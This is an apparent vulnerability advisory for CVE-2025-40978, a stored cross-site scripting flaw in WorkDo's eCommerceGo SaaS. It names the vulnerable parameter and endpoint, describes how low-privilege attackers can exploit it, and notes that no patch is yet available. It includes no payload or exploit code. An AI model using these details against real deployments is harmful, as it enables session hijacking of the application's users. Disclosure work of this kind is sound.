CVE-2025-40978

Vulnerability

CVE-2025-40978 is a stored cross-site scripting (XSS) vulnerability in WorkDo's eCommerceGo SaaS application. The root cause is a lack of proper validation of user input supplied through the reply_description parameter in a POST request to the endpoint /ticket/x/conversion [1].

Exploitation

An authenticated attacker with low privileges can send a crafted POST request containing malicious JavaScript code within the reply_description parameter. The input is stored without sanitization and will be executed in the context of the victim's browser when the ticket or conversion view is loaded [1]. User interaction (e.g., viewing the affected page) is required for the payload to trigger.

Impact

Successful exploitation enables the attacker to execute arbitrary script code in the victim's browser session within the eCommerceGo SaaS application context. This can lead to session hijacking, defacement, or redirection to malicious sites, compromising the confidentiality and integrity of the affected application's data [1].

Mitigation

As of the publication date, no official patch or solution has been reported by WorkDo. The advisory from INCIBE indicates no fix is currently available [1]. Organizations using eCommerceGo SaaS should monitor vendor updates and consider implementing input validation and output encoding as a temporary workaround.